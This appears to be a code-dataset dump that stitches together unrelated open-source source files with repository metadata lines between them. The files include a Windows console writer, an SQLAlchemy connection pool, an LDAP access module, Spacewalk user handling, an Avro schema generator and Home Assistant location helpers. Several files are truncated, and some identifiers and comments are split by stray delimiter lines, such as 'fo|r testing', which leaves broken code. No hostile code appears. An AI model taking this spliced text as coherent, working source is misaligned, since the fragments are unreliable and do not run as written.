BOOL, HANDLE, LPWSTR, DWORD, POINTER(DWORD), LPVOID)(
('WriteConsoleW', windll.kernel32))
self._GetLastError = GetLastError
def flush(self):
# No need to flush the console since it's immediate.
pass
def write(self, text):
try:
if sys.version_info.major == 2 and not isinstance(text, unicode):
# Convert to unicode.
text = str(text).decode(self.encoding, 'replace')
elif sys.version_info.major == 3 and isinstance(text, bytes):
# Bytestrings need to be decoded to a string before being passed to
# Windows.
text = text.decode(self.encoding, 'replace')
remaining = len(text)
while remaining > 0:
n = self._DWORD(0)
# There is a shorter-than-documented limitation on the length of the
# string passed to WriteConsoleW. See
# <http://tahoe-lafs.org/trac/tahoe-lafs/ticket/1232>.
retval = self._WriteConsoleW(
self._console_handle, text,
min(remaining, 10000),
self._byref(n), None)
if retval == 0 or n.value == 0:
raise IOError(
'WriteConsoleW returned %r, n.value = %r, last error = %r' % (
retval, n.value, self._GetLastError()))
remaining -= n.value
if not remaining:
break
text = text[int(n.value):]
except Exception as e:
complain('%s.write: %r' % (self.name, e))
raise
class WinUnicodeOutput(WinUnicodeOutputBase):
"""Output adaptor to a file output on Windows.
If the standard FileWrite function is used, it will be encoded in the current
code page. WriteConsoleW() permits writing any character.
"""
def __init__(self, stream, fileno, encoding):
super(WinUnicodeOutput, self).__init__(
fileno, '<Unicode redirected %s>' % stream.name, encoding)
# Output stream
self._stream = stream
# Flush right now.
self.flush()
def flush(self):
try:
self._stream.flush()
except Exception as e:
complain('%s.flush: %r from %r' % (self.name, e, self._stream))
raise
def write(self, text):
try:
if sys.version_info.major == 2 and isinstance(text, unicode):
# Replace characters that cannot be printed instead of failing.
text = text.encode(self.encoding, 'replace')
if sys.version_info.major == 3 and isinstance(text, bytes):
# Replace cha
|
kleptog/saautopool
|
saautopool.py
|
Python
|
mit
| 3,786
| 0.002905
|
import sqlalchemy.pool
import time
import math
class SAAutoPool(sqlalchemy.pool.QueuePool):
""" A pool class similar to QueuePool but rather than holding some
minimum number of connections open makes an estimate of how many
connections are needed.
The goal is that new connections should be opened at most once every few
seconds and shouldn't create so many that there will be many idle. """
def __init__(self, creator, pool_size=20, open_interval=5, **kw):
""" Create a new SAAutoPool.
pool_size is passed to to the QueuePool parent. You shouldn't need
to adjust this, it's more to provide a hard maximum on the number of
connections.
open_interval is the target interval between the opening of new
connections, in seconds. The default 5 means to aim for opening a
new connection on average once every 5 seconds. """
super(SAAutoPool, self).__init__(creator, pool_size=pool_size, **kw)
self.open_interval = open_interval
# Start at an expected 5 connections, to avoid large churn on
# startup. The 5 is based on the default 5 in QueuePool.
self.mean = 5
self.rate = 1
self.last_ts = self._get_time()
self.qsize = 1
self.next_update = 0
self.decay_rate = math.log(0.5)/60
def _get_time(self):
# Internal function to allow overriding, primarily fo
|
r testing.
return time.time()
def _update_qsize(self, ts, checkout):
# An weighted average, where one minute ago counts half as much.
w = math.exp( (ts-self.last_ts)*self.decay_rate )
self.last_ts = ts
self.rate = w*self.rate
if checkout:
self.rate += (1-math.exp(self.de
|
cay_rate))
level = self.checkedout()
self.mean = w*self.mean + (1-w)*level
if ts > self.next_update:
# The idea is that if we know there are 20 checkouts per second,
# then we want to aim that only 5% of checkouts lead to an
# actual new connection. The number of actual connections is
# tracked by the mean, so by using the inverse CDF of the
# Poisson distribtion we can calculate how many connections we
# actually need to acheive this target.
self.qsize = self._inv_cdf_poisson( 1-(1.0/max(2, self.open_interval*self.rate)), self.mean )
self.next_update = ts+1
@staticmethod
def _inv_cdf_poisson(p, mu):
""" Stupid simple inverse poisson distribution. Actually 1 too high, but that's OK here """
x = 0
n = 0
while x < p:
x += math.exp(-mu)*math.pow(mu, n)/math.factorial(n)
n += 1
return n
def _do_get(self):
self._update_qsize(self._get_time(), True)
conn = super(SAAutoPool, self)._do_get()
# print ">>> last_ts=%.1f ci=%d co=%d=%d-%d+%d qsize=%d" % (self.last_ts, self.checkedin(), self.checkedout(), self._pool.maxsize, self._pool.qsize(), self._overflow, self.qsize)
return conn
def _do_return_conn(self, conn):
self._update_qsize(self._get_time(), False)
super(SAAutoPool, self)._do_return_conn(conn)
# If there's a connection in the pool and the total connections exceeds the limit, close it.
if self.checkedin() > 0 and self.qsize < self.checkedin() + self.checkedout():
conn = self._pool.get()
conn.close()
# This is needed so the connection level count remains accurate
self._dec_overflow()
# print "<<< last_ts=%.1f ci=%d co=%d=%d-%d+%d qsize=%d" % (self.last_ts, self.checkedin(), self.checkedout(), self._pool.maxsize, self._pool.qsize(), self._overflow, self.qsize)
|
ritashugisha/neat
|
neat/pipe/__init__.py
|
Python
|
gpl-3.0
| 255
| 0
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
#
# Copyright (c) 2017 Stephen Bunn (stephen@bunn.io)
# G
|
NU GPLv3 <https://www.gnu.org/licenses/gpl-3.
|
0.en.html>
from ._common import *
from .rethinkdb import RethinkDBPipe
from .mongodb import MongoDBPipe
|
vmax-feihu/hue
|
apps/useradmin/src/useradmin/ldap_access.py
|
Python
|
apache-2.0
| 14,369
| 0.009326
|
#!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This module provides access to LDAP servers, along with some basic functionality required for Hue and
User Admin to work seamlessly with LDAP.
"""
import ldap
import ldap.filter
import logging
import re
from django.contrib.auth.models import User
|
import desktop.conf
from desktop.lib.python_
|
util import CaseInsensitiveDict
LOG = logging.getLogger(__name__)
CACHED_LDAP_CONN = None
class LdapBindException(Exception):
pass
class LdapSearchException(Exception):
pass
def get_connection_from_server(server=None):
ldap_servers = desktop.conf.LDAP.LDAP_SERVERS.get()
if server and ldap_servers:
ldap_config = ldap_servers[server]
else:
ldap_config = desktop.conf.LDAP
return get_connection(ldap_config)
def get_connection(ldap_config):
global CACHED_LDAP_CONN
if CACHED_LDAP_CONN is not None:
return CACHED_LDAP_CONN
ldap_url = ldap_config.LDAP_URL.get()
username = ldap_config.BIND_DN.get()
password = desktop.conf.get_ldap_bind_password(ldap_config)
ldap_cert = ldap_config.LDAP_CERT.get()
search_bind_authentication = ldap_config.SEARCH_BIND_AUTHENTICATION.get()
if ldap_url is None:
raise Exception('No LDAP URL was specified')
if search_bind_authentication:
return LdapConnection(ldap_config, ldap_url, username, password, ldap_cert)
else:
return LdapConnection(ldap_config, ldap_url, get_ldap_username(username, ldap_config.NT_DOMAIN.get()), password, ldap_cert)
def get_ldap_username(username, nt_domain):
if nt_domain:
return '%s@%s' % (username, nt_domain)
else:
return username
def get_ldap_user_kwargs(username):
if desktop.conf.LDAP.IGNORE_USERNAME_CASE.get():
return {
'username__iexact': username
}
else:
return {
'username': username
}
def get_ldap_user(username):
username_kwargs = get_ldap_user_kwargs(username)
return User.objects.get(**username_kwargs)
def get_or_create_ldap_user(username):
username_kwargs = get_ldap_user_kwargs(username)
users = User.objects.filter(**username_kwargs)
if users.exists():
return User.objects.get(**username_kwargs), False
else:
username = desktop.conf.LDAP.FORCE_USERNAME_LOWERCASE.get() and username.lower() or username
return User.objects.create(username=username), True
class LdapConnection(object):
"""
Constructor creates LDAP connection. Contains methods
to easily query an LDAP server.
"""
def __init__(self, ldap_config, ldap_url, bind_user=None, bind_password=None, cert_file=None):
"""
Constructor initializes the LDAP connection
"""
self.ldap_config = ldap_config
if cert_file is not None:
ldap.set_option(ldap.OPT_X_TLS_REQUIRE_CERT, ldap.OPT_X_TLS_ALLOW)
ldap.set_option(ldap.OPT_X_TLS_CACERTFILE, cert_file)
if self.ldap_config.FOLLOW_REFERRALS.get():
ldap.set_option(ldap.OPT_REFERRALS, 1)
else:
ldap.set_option(ldap.OPT_REFERRALS, 0)
if ldap_config.DEBUG.get():
ldap.set_option(ldap.OPT_DEBUG_LEVEL, ldap_config.DEBUG_LEVEL.get())
self.ldap_handle = ldap.initialize(uri=ldap_url, trace_level=ldap_config.TRACE_LEVEL.get())
if bind_user is not None:
try:
self.ldap_handle.simple_bind_s(bind_user, bind_password)
except:
msg = "Failed to bind to LDAP server as user %s" % bind_user
LOG.exception(msg)
raise LdapBindException(msg)
else:
try:
# Do anonymous bind
self.ldap_handle.simple_bind_s('','')
except:
msg = "Failed to bind to LDAP server anonymously"
LOG.exception(msg)
raise LdapBindException(msg)
def _get_search_params(self, name, attr, find_by_dn=False):
"""
if we are to find this ldap object by full distinguished name,
then search by setting search_dn to the 'name'
rather than by filtering by 'attr'.
"""
base_dn = self._get_root_dn()
if find_by_dn:
search_dn = re.sub(r'(\w+=)', lambda match: match.group(0).upper(), name)
if not search_dn.upper().endswith(base_dn.upper()):
raise LdapSearchException("Distinguished Name provided does not contain configured Base DN. Base DN: %(base_dn)s, DN: %(dn)s" % {
'base_dn': base_dn,
'dn': search_dn
})
return (search_dn, '')
else:
return (base_dn, '(' + attr + '=' + name + ')')
def _transform_find_user_results(self, result_data, user_name_attr):
"""
:param result_data: List of dictionaries that have ldap attributes and their associated values. Generally the result list from an ldapsearch request.
:param user_name_attr: The ldap attribute that is returned by the server to map to ``username`` in the return dictionary.
:returns list of dictionaries that take on the following form: {
'dn': <distinguished name of entry>,
'username': <ldap attribute associated with user_name_attr>
'first': <first name>
'last': <last name>
'email': <email>
'groups': <list of DNs of groups that user is a member of>
}
"""
user_info = []
if result_data:
for dn, data in result_data:
# Skip Active Directory # refldap entries.
if dn is not None:
# Case insensitivity
data = CaseInsensitiveDict.from_dict(data)
# Skip unnamed entries.
if user_name_attr not in data:
LOG.warn('Could not find %s in ldap attributes' % user_name_attr)
continue
ldap_info = {
'dn': dn,
'username': data[user_name_attr][0]
}
if 'givenName' in data:
ldap_info['first'] = data['givenName'][0]
if 'sn' in data:
ldap_info['last'] = data['sn'][0]
if 'mail' in data:
ldap_info['email'] = data['mail'][0]
# memberOf and isMemberOf should be the same if they both exist
if 'memberOf' in data:
ldap_info['groups'] = data['memberOf']
if 'isMemberOf' in data:
ldap_info['groups'] = data['isMemberOf']
user_info.append(ldap_info)
return user_info
def _transform_find_group_results(self, result_data, group_name_attr, group_member_attr):
group_info = []
if result_data:
for dn, data in result_data:
# Skip Active Directory # refldap entries.
if dn is not None:
# Case insensitivity
data = CaseInsensitiveDict.from_dict(data)
# Skip unnamed entries.
if group_name_attr not in data:
LOG.warn('Could not find %s in ldap attributes' % group_name_attr)
continue
group_name = data[group_name_attr][0]
if desktop.conf.LDAP.FORCE_USERNAME_LOWERCASE.get():
group_name = group_name.lower()
ldap_info = {
'dn': dn,
'name': group_name
}
if group_member_attr in data and 'posixGroup' not in data['objectClass']:
ldap_info['members'] = data[group_member_attr]
else:
ldap_info['members'] = []
if 'posixGroup' in data['objectClass'] and 'memberUid' in data:
ldap_info['posix_members'] = data['memberUid']
else:
ldap_info['posix_members'] = []
group_info.append(ldap_info)
return group_info
def find_users(self, username_pattern, search_attr=None, user_name
|
colloquium/spacewalk
|
backend/server/rhnUser.py
|
Python
|
gpl-2.0
| 28,422
| 0.004398
|
#
# Copyright (c) 2008--2010 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public License,
# version 2 (GPLv2). There is NO WARRANTY for this software, express or
# implied, including the implied warranties of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2
# along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
#
# Red Hat trademarks are not licensed under GPLv2. No permission is
# granted to use or replicate Red Hat trademarks that are incorporated
# in this software or its documentation.
#
#
# Stuff for handling Certificates and Servers
#
import re
import crypt
import string
# Global Modules
from spacewalk.common import UserDictCase, rhnFault, rhnException, \
CFG, log_debug, log_error
from spacewalk.common.rhnTranslate import _
import rhnSQL
import rhnSession
# Main User class
class User:
def __init__(self, username, password):
# compatibilty with the rest of the code
self.username = username
# placeholders for the table schemas
# web_contact
self.contact = rhnSQL.Row("web_contact", "id")
self.contact["login"] = username
self.contact["password"] = password
self.contact["old_password"] = password
# web_customer
self.customer = rhnSQL.Row("web_customer", "id")
self.customer["name"] = username
self.customer["password"] = password
# web_user_personal_info
self.__init_info()
# web_user_contact_permission
self.__init_perms()
# web_user_site_info
self.__init_site()
self._session = None
# init web_user_personal_info
def __init_info(self):
# web_user_personal_info
self.info = rhnSQL.Row("web_user_personal_info",
"web_user_id")
self.info['first_names'] = "Valued"
self.info['last_name'] = "Customer"
self.info['prefix'] = "Mr."
# init web_user_contact_permission
def __init_perms(self):
# web_user_contact_permission
self.perms = rhnSQL.Row("web_user_contact_permission",
"web_user_id")
self.perms["email"] = "Y"
self.perms["mail"] = "Y"
self.perms["call"] = "Y"
self.perms["fax"] = "Y"
# init web_user_site_info
def __init_site(self):
# web_user_site_info
self.site = rhnSQL.Row("web_user_site_info", "id")
self.site['city'] = "."
self.site['address1'] = "."
self.site['country'] = "US"
self.site['type'] = "M"
self.site['notes'] = "Entry created by Spacewalk registration process"
# simple check for a password that might become more complex sometime
def check_password(self, password):
good_pwd = str(self.contact["password"])
old_pwd = str(self.contact["old_password"])
if CFG.pam_auth_service:
# a PAM service is defined
# We have to check the user's rhnUserInfo.use_pam_authentication
# XXX Should we create yet another __init_blah function?
# since it's the first time we had to lool at rhnUserInfo,
# I'll assume it's not something to happen very frequently,
# so I'll use a query for now
# - misa
#
h = rhnSQL.prepare("""
select ui.use_pam_authentication
from web_contact w, rhnUserInfo ui
where w.login_uc = UPPER(:login)
and w.id = ui.user_id""")
h.execute(login=self.contact["login"])
data = h.fetchone_dict()
if not data:
# This should not happen
raise rhnException("No entry found for user %s" %
self.contact["login"])
if data['use_pam_authentication'] == 'Y':
# use PAM
import rhnAuthPAM
return rhnAuthPAM.check_password(self.contact["login"],
password, CFG.pam_auth_service)
# If the entry in rhnUserInfo is 'N', perform regular
# authentication
return check_password(password, good_pwd, old_pwd)
def set_org_id(self, org_id):
if not org_id:
raise rhnException("Invalid org_id requested for user", org_id)
self.contact["org_id"] = int(org_id)
self.customer.load(int(org_id))
def getid(self):
if not self.contact.has_key("id"):
userid = rhnSQL.Sequence("web_contact_id_seq")()
self.contact.data["id"] = userid # kind of illegal, but hey!
else:
userid = self.contact["id"]
return userid
# handling of contact permissions
def set_contact_perm(self, name, value):
if not name: return -1
n = string.lower(name)
v = 'N'
if value:
v = 'Y'
if n == "contact_phone": self.perms["call"] = v
elif n == "contact_mail": self.perms["mail"] = v
elif n == "contact_email": self.perms["email"] = v
elif n == "contact_fax": self.perms["fax"] = v
return 0
# set a certain value for the userinfo field. This is BUTT ugly.
def set_info(self, name, value):
log_debug(3, name, value)
# translation from what the client send us to real names of the fields
# in the tables.
mapping = {
"first_name" : "first_names",
"position" : "title",
"title" : "prefix"
}
if not name:
return -1
name = string.lower(name)
if type(value) == type(""):
value = string.strip(value)
# We have to watch over carefully for different field names
# being sent from rhn_register (up2date --register)
changed = 0
# translation
if name in mapping.keys():
name = mapping[name]
# Some fields can not have null string values
if name in ["first_names", "last_name", "prefix", # personal_info
"address1", "city", "country"]: # site_info
# we require something of it
if len(str(value)) == 0:
return -1
# fields in personal_info (and some in site)
if name in ["last_name", "first_names",
"company", "phone", "fax", "email", "title"]:
self.info[name] = value[:128]
changed = 1
elif name == "prefix":
values = ["Mr.", "Mrs.", "Ms.", "Dr.", "Hr.", "Sr."]
# Now populate a dictinary of valid values
valids = UserDictCase()
for v in values: # initialize from good values, with and w/o the dot
valids[v] = v
valids[v[:-1]] = v
# commonly encountered values
valids["Miss"] = "Miss"
valids["Herr"] = "Hr."
valids["Sig."] = "Sr."
valids["Sir"] = "Mr."
# Now check it out
if valids.has_key(value):
self.info["prefix"] = valids[value]
changed = 1
else:
log_error("Unknown prefix value `%s'. Assumed `Mr.' instead"
% value)
self.info["prefix"] = "
|
Mr."
changed = 1
# fields in site
if name in ["phone", "fa
|
x", "zip"]:
self.site[name] = value[:32]
changed = 1
elif name in ["city", "country", "alt_first_names", "alt_last_name",
"address1", "address2", "email",
"last_name", "first_names"]:
if name == "last_name":
self.site["alt_last_name"] = value
changed = 1
elif name == "first_names":
self.site["alt_first_names"] = value
changed = 1
else:
self.site[name] = value[:128]
changed = 1
elif name in ["state"]: # st
|
michaelhkw/incubator-impala
|
testdata/bin/random_avro_schema.py
|
Python
|
apache-2.0
| 6,014
| 0.00981
|
#!/usr/bin/env impala-python
#
# Lice
|
nsed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this
|
file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from random import choice, randint, random, shuffle
from os.path import join as join_path
from optparse import OptionParser
import json
MAX_NUM_STRUCT_FIELDS = 8
NULL_CHANCE = 0.5
SCALAR_TYPES = ['boolean', 'int', 'long', 'float', 'double', 'string']
class Node(object):
def __init__(self, num_fields, node_type):
self.node_type = node_type # one of struct, map, array
self.num_fields = num_fields
self.fields = []
class SchemaTreeGenerator(object):
def __init__(self, target_num_scalars=10, target_depth=3):
self._target_num_scalars = target_num_scalars
self._target_depth = target_depth
self._nodes = []
self._num_scalars_created = 0
self.root = None
def _create_random_node(self):
node_type = choice(('map', 'array', 'struct'))
if node_type in ('map', 'array'):
result_node = Node(1, node_type)
else:
num_fields = randint(1, MAX_NUM_STRUCT_FIELDS)
self._num_scalars_created += num_fields - 1
result_node = Node(num_fields, 'struct')
self._nodes.append(result_node)
return result_node
def _get_random_existing_node(self):
nodes = []
for node in self._nodes:
for _ in range(node.num_fields - len(node.fields)):
nodes.append(node)
return choice(nodes)
def _generate_rest(self):
while self._num_scalars_created < self._target_num_scalars:
node = self._get_random_existing_node()
node.fields.append(self._create_random_node())
self._finalize()
def _generate_trunk(self):
cur = self.root
for i in range(self._target_depth):
new_node = self._create_random_node()
self._nodes.append(new_node)
cur.fields.append(new_node)
cur = new_node
def _finalize(self):
for node in self._nodes:
for _ in range(node.num_fields - len(node.fields)):
node.fields.append(choice(SCALAR_TYPES))
shuffle(node.fields)
def create_tree(self):
self.root = Node(randint(1, MAX_NUM_STRUCT_FIELDS), 'struct')
self._nodes = [self.root]
self._num_scalars_created = self.root.num_fields
self._generate_trunk()
self._generate_rest()
return self.root
class AvroGenerator(object):
def __init__(self, schema_tree_generator):
self.cur_id = 0
self._schema_tree_generator = schema_tree_generator
def _next_id(self):
self.cur_id += 1
return str(self.cur_id)
def clear_state(self):
self.cur_id = 0
def create(self, table_name):
tree_root = self._schema_tree_generator.create_tree()
result = {}
result['type'] = 'record'
result['namespace'] = 'org.apache.impala'
result['name'] = table_name
result['fields'] = self._convert_struct_fields(tree_root.fields)
return result
def _convert_struct_fields(self, fields):
return [self._convert_struct_field(field) for field in fields]
def _convert_struct_field(self, struct_field_node):
result = {}
result['type'] = self._convert_node(struct_field_node)
result['name'] = 'field_' + self._next_id()
return result
def _convert_node(self, node):
if isinstance(node, str):
result = node
elif node.node_type == 'array':
result = self._convert_array(node)
elif node.node_type == 'map':
result = self._convert_map(node)
elif node.node_type == 'struct':
result = self._convert_struct(node)
else:
assert False, 'Unknown type: ' + node.node_types
if random() < NULL_CHANCE:
# Make it nullable
return ['null', result]
else:
return result
def _convert_array(self, array_node):
result = {}
result['type'] = 'array'
result['items'] = self._convert_node(array_node.fields[0])
return result
def _convert_map(self, map_node):
result = {}
result['type'] = 'map'
result['values'] = self._convert_node(map_node.fields[0])
return result
def _convert_struct(self, struct_node):
result = {}
result['type'] = 'record'
result['name'] = 'struct_' + self._next_id()
result['fields'] = self._convert_struct_fields(struct_node.fields)
return result
if __name__ == '__main__':
parser = OptionParser()
parser.add_option('--target_dir', default='/tmp',
help='Directory where the avro schemas will be saved.')
parser.add_option('--num_tables', default='4', type='int',
help='Number of schemas to generate.')
parser.add_option('--num_scalars', default='10', type='int',
help='Number of schemas to generate.')
parser.add_option('--nesting_depth', default='3', type='int',
help='Number of schemas to generate.')
parser.add_option('--base_table_name', default='table_',
help='Base table name.')
options, args = parser.parse_args()
schema_generator = SchemaTreeGenerator(target_num_scalars=options.num_scalars,
target_depth=options.nesting_depth)
writer = AvroGenerator(schema_generator)
for table_num in range(options.num_tables):
writer.clear_state()
table_name = options.base_table_name + str(table_num)
json_result = writer.create(table_name)
file_path = join_path(options.target_dir, table_name + '.avsc')
with open(file_path, 'w') as f:
json.dump(json_result, f, indent=2, sort_keys=True)
|
johnreswebpro/CoilSnake
|
coilsnake/util/eb/text.py
|
Python
|
gpl-3.0
| 1,914
| 0.002612
|
def standard_text_from_block(block, offset, max_length):
str = ''
for i in range(offset, offset + max_length):
c = block[i]
if c == 0:
return str
else:
str += chr(c - 0x30)
return str
def standard_text_to_byte_list(text, max_length):
byte_list = []
text_pos = 0
while text_pos < len(text):
c = text[text_pos]
if c == '[':
end_bracket_pos = text.find(']', text_pos)
if end_bracket_pos == -1:
raise ValueError("String contains '[' at position {} but no subsequent ']': {}".format(
text_pos, text
))
bracket_bytes = text[text_pos+1:end_bracket_pos].split()
for bracket_byte in bracket_bytes:
if len(bracket_byte) != 2:
raise ValueError("String contains invalid hex number '{}', must be two digits: {}".format(
bracket_byte, text
))
|
try:
bracket_byte_value = int(bracket_byte, 16)
except ValueError as e:
raise ValueError("String contains invalid hex number '{}': {}".format(
bracket_byte, text
), e)
byte_list.append(bracket_byte_value)
text_pos = end_brack
|
et_pos + 1
else:
byte_list.append(ord(c) + 0x30)
text_pos += 1
num_bytes = len(byte_list)
if num_bytes > max_length:
raise ValueError("String cannot be written in {} bytes or less: {}".format(
max_length, text
))
elif num_bytes < max_length:
byte_list.append(0)
return byte_list
def standard_text_to_block(block, offset, text, max_length):
byte_list = standard_text_to_byte_list(text, max_length)
block[offset:offset+len(byte_list)] = byte_list
|
fredmorcos/attic
|
projects/grafeo/attic/grafeo_20100227_python/grafeo/config/Config.py
|
Python
|
isc
| 46
| 0
|
INST
|
ALL_PATH = '/home/fred/
|
workspace/grafeo/'
|
leppa/home-assistant
|
homeassistant/util/location.py
|
Python
|
apache-2.0
| 6,274
| 0.000956
|
"""
Module with location helpers.
detect_location_info and elevation are mocked by default during tests.
"""
import asyncio
import collections
import math
from typing import Any, Dict, Optional, Tuple
import aiohttp
ELEVATION_URL = "https://api.open-elevation.com/api/v1/lookup"
IP_API = "http://ip-api.com/json"
IPAPI = "https://ipapi.co/json/"
# Constants from https://github.com/maurycyp/vincenty
# Earth ellipsoid according to WGS 84
# Axis a of the ellipsoid (Radius of the earth in meters)
AXIS_A = 6378137
# Flattening f = (a-b) / a
FLATTENING = 1 / 298.257223563
# Axis b of the ellipsoid in meters.
AXIS_B = 6356752.314245
MILES_PER_KILOMETER = 0.621371
MAX_ITERATIONS = 200
CONVERGENCE_THRESHOLD = 1e-12
LocationInfo = collections.namedtuple(
"LocationInfo",
[
"ip",
"country_code",
"country_name",
"region_code",
"region_name",
"city",
"zip_code",
"time_zone",
"latitude",
"longitude",
"use_metric",
],
)
async def async_detect_location_info(
session: aiohttp.ClientSession,
) -> Optional[LocationInfo]:
"""Detect location information."""
data = await _get_ipapi(session)
if data is None:
data = await _get_ip_api(session)
if data is None:
return None
data["use_metric"] = data["country_code"] not in ("US", "MM", "LR")
return LocationInfo(**data)
def distance(
lat1: Optional[float], lon1: Optional[float], lat2: float, lon2: float
) -> Optional[float]:
"""Calculate the distance in meters between two points.
Async friendly.
"""
if lat1 is None or lon1 is None:
return None
result = vincenty((lat1, lon1), (lat2, lon2))
if result is None:
return None
return result * 1000
# Author: https://github.com/maurycyp
# Source: https://github.com/maurycyp/vincenty
# License: https://github.com/maurycyp/vincenty/blob/master/LICENSE
# pylint: disable=invalid-name
def vincenty(
point1: Tuple[float, float], point2: Tuple[float, float], miles: bool = False
) -> Optional[float]:
"""
Vincenty formula (inverse method) to calculate the distance.
Result in kilometers or miles between two points on the surface of a
spheroid.
Async friendly.
"""
# short-circuit coincident points
if point1[0] == point2[0] and point1[1] == point2[1]:
return 0.0
U1 = math.atan((1 - FLATTENING) * math.tan(math.radians(point1[0])))
U2 = math.atan((1 - FLATTENING) * math.tan(math.radians(point2[0])))
L = math.radians(point2[1] - point1[1])
Lambda = L
sinU1 = math.sin(U1)
cosU1 = math.cos(U1)
sinU2 = math.sin(U2)
cosU2 = math.cos(U2)
for _ in range(MAX_ITERATIONS):
sinLambda = math.sin(Lambda)
cosLambda = math.cos(Lambda)
sinSigma = math.sqrt(
(cosU2 * sinLambda) ** 2 + (cosU1 * sinU2 - sinU1 * cosU2 * cosLambda) ** 2
)
if sinSigma == 0.0:
return 0.0 # coincident points
cosSigma = sinU1 * sinU2 + cosU1 * cosU2 * cosLambda
sigma = math.atan2(sinSigma, cosSigma)
sinAlpha = cosU1 * cosU2 * sinLambda / sinSigma
cosSqAlpha = 1 - sinAlpha ** 2
try:
cos2SigmaM = cosSigma - 2 * sinU1 * sinU2 / cosSqAlpha
except ZeroDivisionError:
cos2SigmaM = 0
C = FLATTENING / 16 * cosSqAlpha * (4 + FLATTENING * (4 - 3 * cosSqAlpha))
LambdaPrev = Lambda
Lambda = L + (1 - C) * FLATTENING * sinAlpha * (
sigma
+ C * sinSigma * (cos2SigmaM + C * cosSigma * (-1 + 2 * cos2SigmaM ** 2))
)
if abs(Lambda - LambdaPrev) < CONVERGENCE_THRESHOLD:
break # successful convergence
else:
return None # failure to converge
uSq = cosSqAlpha * (AXIS_A ** 2 - AXIS_B ** 2) / (AXIS_B ** 2)
A = 1 + uSq / 16384 * (4096 + uSq * (-768 + uSq * (320 - 175 * uSq)))
B = uSq / 1024 * (256 + uSq * (-128 + uSq * (74 - 47 * uSq)))
deltaSigma = (
B
* sinSigma
* (
cos2SigmaM
+ B
/ 4
* (
cosSigma * (-1 + 2 * cos2SigmaM ** 2)
- B
/ 6
* cos2SigmaM
* (-3 + 4 * sinSigma ** 2)
* (-3 + 4 * cos2SigmaM ** 2)
)
)
)
s = AXIS_B * A * (sigma - deltaSigma)
s /= 1000 # Conversion of meters to kilometers
if miles:
s *= MILES_PER_KILOMETER # kilometers to miles
return round(s, 6)
async def _get_ipapi(session: aiohttp.ClientSession) -> Optional[Dict[str, Any]]:
"""Query ipapi.co for location data."""
try:
resp = await session.get(IPAPI, timeout=5)
except (aiohttp.ClientError, asyncio.TimeoutError):
return None
try:
raw_info = await resp.json()
except (aiohttp.ClientError, ValueError):
return No
|
ne
return
|
{
"ip": raw_info.get("ip"),
"country_code": raw_info.get("country"),
"country_name": raw_info.get("country_name"),
"region_code": raw_info.get("region_code"),
"region_name": raw_info.get("region"),
"city": raw_info.get("city"),
"zip_code": raw_info.get("postal"),
"time_zone": raw_info.get("timezone"),
"latitude": raw_info.get("latitude"),
"longitude": raw_info.get("longitude"),
}
async def _get_ip_api(session: aiohttp.ClientSession) -> Optional[Dict[str, Any]]:
"""Query ip-api.com for location data."""
try:
resp = await session.get(IP_API, timeout=5)
except (aiohttp.ClientError, asyncio.TimeoutError):
return None
try:
raw_info = await resp.json()
except (aiohttp.ClientError, ValueError):
return None
return {
"ip": raw_info.get("query"),
"country_code": raw_info.get("countryCode"),
"country_name": raw_info.get("country"),
"region_code": raw_info.get("region"),
"region_name": raw_info.get("regionName"),
"city": raw_info.get("city"),
"zip_code": raw_info.get("zip"),
"time_zone": raw_info.get("timezone"),
"latitude": raw_info.get("lat"),
"longitude": raw_info.get("lon"),
}
|
jmakov/ggrc-core
|
test/selenium/src/lib/page/widget/admin_people.py
|
Python
|
apache-2.0
| 457
| 0.002188
|
# Copyright (C) 2015 Google Inc., authors, and contributors <see AUTHORS file>
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# Created By: jernej@reciprocitylabs.com
# Maintained By: jernej@reciprocitylabs.com
from lib import environment
from lib.const
|
ants import url
from lib.page.widget.base import Widget
class AdminPeople(Widget):
URL = environment.APP_URL \
+ url.ADMIN_DASHBOARD \
+ url.Widget.
|
PEOPLE
|
wood-galaxy/FreeCAD
|
src/Mod/Fem/FemInputWriter.py
|
Python
|
lgpl-2.1
| 9,277
| 0.003557
|
# ***************************************************************************
# * *
# * Copyright (c) 2016 - Bernd Hahnebach <bernd@bimstatik.org> *
# * *
# * This program is free software; you can redistribute it and/or modify *
# * it under the terms of the GNU Lesser General Public License (LGPL) *
# * as published by the Free Software Foundation; either version 2 of *
# * the License, or (at your option) any later version. *
# * for detail see the LICENCE text file. *
# * *
# * This program is distributed in the hope that it will be useful, *
# * but WITHOUT ANY WARRANTY; without even the implied warranty of *
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
# * GNU Library General Public License for more details. *
# * *
# * You should have received a copy of the GNU Library General Public *
# * License along with this program; if not, write to the Free Software *
# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
# * USA *
# * *
# ***************************************************************************
'''
- next step would be save the constraints node and element data in the in the FreeCAD FEM Mesh Object
and link them to the appropriate constraint object
- if the informations are used by the FEM Mesh file exporter FreeCAD would support writing FEM Mesh Groups
- which is a most needed feature of FEM module
- smesh supports mesh groups, how about pythonbinding in FreeCAD. Is there somethin implemented allready?
'''
